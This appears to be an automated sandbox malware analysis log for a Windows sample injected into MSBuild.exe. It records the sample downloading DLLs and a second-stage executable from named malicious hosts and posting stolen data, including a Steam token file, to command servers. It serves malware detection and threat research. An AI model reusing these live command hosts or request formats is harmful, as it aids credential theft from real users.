Source: global traffic HTTP traffic detected: GET /freebl3.dll HTTP/1.1Host: lade.petperfectcare.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /mozglue.dll HTTP/1.1Host: lade.petperfectcare.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /msvcp140.dll HTTP/1.1Host: lade.petperfectcare.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /softokn3.dll HTTP/1.1Host: lade.petperfectcare.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1Host: lade.petperfectcare.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /nss3.dll HTTP/1.1Host: lade.petperfectcare.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CBKFIECBGDHJKECAKFBGHost: lade.petperfectcare.comContent-Length: 1145Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GCBGCAFIIECBFIDHIJKFHost: lade.petperfectcare.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 32 36 34 30 64 62 65 38 65 66 65 63 34 62 36 66 34 66 62 36 63 61 35 33 35 61 36 63 35 65 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 36 39 34 62 36 64 35 30 31 39 39 65 61 34 34 32 30 37 61 39 37 65 32 35 64 64 61 35 35 30 36 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 33 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 2d 2d 0d 0a Data Ascii: ------GCBGCAFIIECBFIDHIJKFContent-Disposition: form-data; name="token"372640dbe8efec4b6f4fb6ca535a6c5e------GCBGCAFIIECBFIDHIJKFContent-Disposition: form-data; name="build_id"e694b6d50199ea44207a97e25dda5506------GCBGCAFIIECBFIDHIJKFContent-Disposition: form-data; name="mode"3------GCBGCAFIIECBFIDHIJKF--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KFHJJJKKFHIDAAKFBFBFHost: lade.petperfectcare.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 4a 4b 4b 46 48 49 44 41 41 4b 46 42 46 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 32 36 34 30 64 62 65 38 65 66 65 63 34 62 36 66 34 66 62 36 63 61 35 33 35 61 36 63 35 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 4a 4b 4b 46 48 49 44 41 41 4b 46 42 46 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 36 39 34 62 36 64 35 30 31 39 39 65 61 34 34 32 30 37 61 39 37 65 32 35 64 64 61 35 35 30 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 4a 4b 4b 46 48 49 44 41 41 4b 46 42 46 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 4a 4b 4b 46 48 49 44 41 41 4b 46 42 46 42 46 2d 2d 0d 0a Data Ascii: ------KFHJJJKKFHIDAAKFBFBFContent-Disposition: form-data; name="token"372640dbe8efec4b6f4fb6ca535a6c5e------KFHJJJKKFHIDAAKFBFBFContent-Disposition: form-data; name="build_id"e694b6d50199ea44207a97e25dda5506------KFHJJJKKFHIDAAKFBFBFContent-Disposition: form-data; name="mode"4------KFHJJJKKFHIDAAKFBFBF--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EHCGIJDHDGDBGDGCGCFHHost: lade.petperfectcare.comContent-Length: 461Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 43 47 49 4a 44 48 44 47 44 42 47 44 47 43 47 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 32 36 34 30 64 62 65 38 65 66 65 63 34 62 36 66 34 66 62 36 63 61 35 33 35 61 36 63 35 65 0d 0a 2d 2d 2d 2d 2d 2d 45 48 43 47 49 4a 44 48 44 47 44 42 47 44 47 43 47 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 36 39 34 62 36 64 35 30 31 39 39 65 61 34 34 32 30 37 61 39 37 65 32 35 64 64 61 35 35 30 36 0d 0a 2d 2d 2d 2d 2d 2d 45 48 43 47 49 4a 44 48 44 47 44 42 47 44 47 43 47 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 55 32 39 6d 64 46 78 54 64 47 56 68 62 56 78 7a 64 47 56 68 62 56 39 30 62 32 74 6c 62 6e 4d 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 45 48 43 47 49 4a 44 48 44 47 44 42 47 44 47 43 47 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 64 61 74 61 22 0d 0a 0d 0a 4e 4f 6d 77 41 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 48 43 47 49 4a 44 48 44 47 44 42 47 44 47 43 47 43 46 48 2d 2d 0d 0a Data Ascii: ------EHCGIJDHDGDBGDGCGCFHContent-Disposition: form-data; name="token"372640dbe8efec4b6f4fb6ca535a6c5e------EHCGIJDHDGDBGDGCGCFHContent-Disposition: form-data; name="build_id"e694b6d50199ea44207a97e25dda5506------EHCGIJDHDGDBGDGCGCFHContent-Disposition: form-data; name="file_name"U29mdFxTdGVhbVxzdGVhbV90b2tlbnMudHh0------EHCGIJDHDGDBGDGCGCFHContent-Disposition: form-data; name="file_data"NOmwAg==------EHCGIJDHDGDBGDGCGCFH--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JEHIJJKEGHJJKECBKECFHost: lade.petperfectcare.comContent-Length: 130769Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CAFIEBKKJJDAKFHIDBFHHost: lade.petperfectcare.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 46 49 45 42 4b 4b 4a 4a 44 41 4b 46 48 49 44 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 32 36 34 30 64 62 65 38 65 66 65 63 34 62 36 66 34 66 62 36 63 61 35 33 35 61 36 63 35 65 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 49 45 42 4b 4b 4a 4a 44 41 4b 46 48 49 44 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 36 39 34 62 36 64 35 30 31 39 39 65 61 34 34 32 30 37 61 39 37 65 32 35 64 64 61 35 35 30 36 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 49 45 42 4b 4b 4a 4a 44 41 4b 46 48 49 44 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 35 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 49 45 42 4b 4b 4a 4a 44 41 4b 46 48 49 44 42 46 48 2d 2d 0d 0a Data Ascii: ------CAFIEBKKJJDAKFHIDBFHContent-Disposition: form-data; name="token"372640dbe8efec4b6f4fb6ca535a6c5e------CAFIEBKKJJDAKFHIDBFHContent-Disposition: form-data; name="build_id"e694b6d50199ea44207a97e25dda5506------CAFIEBKKJJDAKFHIDBFHContent-Disposition: form-data; name="mode"5------CAFIEBKKJJDAKFHIDBFH--
Source: global traffic HTTP traffic detected: GET /ldms/a43486128347.exe HTTP/1.1Host: nsdm.cumpar-auto-orice-tip.roCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BGIJDGCAEBFIIECAKFHIHost: lade.petperfectcare.comContent-Length: 499Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 32 36 34 30 64 62 65 38 65 66 65 63 34 62 36 66 34 66 62 36 63 61 35 33 35 61 36 63 35 65 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 36 39 34 62 36 64 35 30 31 39 39 65 61 34 34 32 30 37 61 39 37 65 32 35 64 64 61 35 35 30 36 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 35 31 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 61 73 6b 5f 69 64 22 0d 0a 0d 0a 31 32 38 34 32 30 35 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 73 74 61 74 75 73 22 0d 0a 0d 0a 31 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 2d 2d 0d 0a Data Ascii: ------BGIJDGCAEBFIIECAKFHIContent-Disposition: form-data; name="token"372640dbe8efec4b6f4fb6ca535a6c5e------BGIJDGCAEBFIIECAKFHIContent-Disposition: form-data; name="build_id"e694b6d50199ea44207a97e25dda5506------BGIJDGCAEBFIIECAKFHIContent-Disposition: form-data; name="mode"51------BGIJDGCAEBFIIECAKFHIContent-Disposition: form-data; name="task_id"1284205------BGIJDGCAEBFIIECAKFHIContent-Disposition: form-data; name="status"1------BGIJDGCAEBFIIECAKFHI--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EGIDAAFIEHIEHJKFHCAEHost: lade.petperfectcare.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 49 44 41 41 46 49 45 48 49 45 48 4a 4b 46 48 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 32 36 34 30 64 62 65 38 65 66 65 63 34 62 36 66 34 66 62 36 63 61 35 33 35 61 36 63 35 65 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 41 41 46 49 45 48 49 45 48 4a 4b 46 48 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 36 39 34 62 36 64 35 30 31 39 39 65 61 34 34 32 30 37 61 39 37 65 32 35 64 64 61 35 35 30 36 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 41 41 46 49 45 48 49 45 48 4a 4b 46 48 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 36 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 41 41 46 49 45 48 49 45 48 4a 4b 46 48 43 41 45 2d 2d 0d 0a Data Ascii: ------EGIDAAFIEHIEHJKFHCAEContent-Disposition: form-data; name="token"372640dbe8efec4b6f4fb6ca535a6c5e------EGIDAAFIEHIEHJKFHCAEContent-Disposition: form-data; name="build_id"e694b6d50199ea44207a97e25dda5506------EGIDAAFIEHIEHJKFHCAEContent-Disposition: form-data; name="mode"6------EGIDAAFIEHIEHJKFHCAE--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BGHIDGCAFCBAAAAAFHDAHost: cowod.hopto.orgContent-Length: 5757Connection: Keep-AliveCache-Control: no-cache
Source: Joe Sandbox View IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View IP Address: 95.164.90.97 95.164.90.97
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View ASN Name: VAKPoltavaUkraineUA VAKPoltavaUkraineUA
Source: Joe Sandbox View JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:51636 -> 147.45.44.104:80
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: wickedneatr.sbs
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=vmF.kaNqUEmI1.qePWdiTp6vBz.dmeIQmRcdUjlLAWk-1728319428-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 42Host: wickedneatr.sbs
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00406963 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, 3_2_00406963
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: lade.petperfectcare.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /sql.dll HTTP/1.1Host: lade.petperfectcare.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /freebl3.dll HTTP/1.1Host: lade.petperfectcare.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /freebl3.dll HTTP/1.1Host: lade.petperfectcare.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /mozglue.dll HTTP/1.1Host: lade.petperfectcare.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /msvcp140.dll HTTP/1.1Host: lade.petperfectcare.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /softokn3.dll HTTP/1.1Host: lade.petperfectcare.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1Host: lade.petperfectcare.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /nss3.dll HTTP/1.1Host: lade.petperfectcare.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /ldms/a43486128347.exe HTTP/1.1Host: nsdm.cumpar-auto-orice-tip.roCache-Control: no-cache
Source: global traffic DNS traffic detected: DNS query: lade.petperfectcare.com
Source: global traffic DNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa
Source: global traffic DNS traffic detected: DNS query: nsdm.cumpar-auto-orice-tip.ro
Source: global traffic DNS traffic detected: DNS query: exemplarou.sbs
Source: global traffic DNS traffic detected: DNS query: frizzettei.sbs
Source: global traffic DNS traffic detected: DNS query: isoplethui.sbs
Source: global traffic DNS traffic detected: DNS query: bemuzzeki.sbs
Source: global traffic DNS traffic detected: DNS query: exilepolsiy.sbs
Source: global traffic DNS traffic detected: DNS query: laddyirekyi.sbs
Source: global traffic DNS traffic detected: DNS query: invinjurhey.sbs
Source: global traffic DNS traffic detected: DNS query: wickedneatr.sbs
Source: global traffic DNS traffic detected: DNS query: cowod.hopto.org
Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: wickedneatr.sbs
Source: MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2191931975.0000000023BAE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2188979014.000000001DC31000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2191931975.0000000023BAE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2188979014.000000001DC31000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2191931975.0000000023BAE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2188979014.000000001DC31000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2191931975.0000000023BAE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2188979014.000000001DC31000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2191931975.0000000023BAE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2188979014.000000001DC31000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: MSBuild.exe, 00000003.00000002.2174458155.000000000056B000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://cowod.EBFIIECAKFHI
Source: MSBuild.exe, 00000003.00000002.2174458155.000000000056B000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://cowod.hopto
Source: MSBuild.exe, 00000003.00000002.2174458155.000000000056B000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://cowod.hopto.
Source: MSBuild.exe, 00000003.00000002.2174458155.000000000056B000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://cowod.hopto.CAKFHI
Source: MSBuild.exe, 00000003.00000002.2174458155.000000000056B000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://cowod.hopto.org
Source: MSBuild.exe, 00000003.00000002.2175828757.0000000000FA8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cowod.hopto.org/
Source: MSBuild.exe, 00000003.00000002.2175828757.0000000000FA8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cowod.hopto.org/S
Source: MSBuild.exe, 00000003.00000002.2174458155.000000000056B000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://cowod.hopto.orgCFH
Source: f1r6P3j3g7.exe, 00000000.00000002.1815003832.000000000091D000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, 00000003.00000002.2174458155.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://cowod.hopto.org_DEBUG.zip/c
Source: MSBuild.exe, 00000003.00000002.2174458155.000000000056B000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://cowod.hopto.orga535a6c5ent-Disposition:
Source: MSBuild.exe, 00000003.00000002.2174458155.000000000056B000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://cowod.hopto.orgare.com:80
Source: MSBuild.exe, 00000003.00000002.2174458155.000000000056B000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://cowod.hoptoECAKFHI
Source: MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2191931975.0000000023BAE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2188979014.000000001DC31000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2191931975.0000000023BAE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2188979014.000000001DC31000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
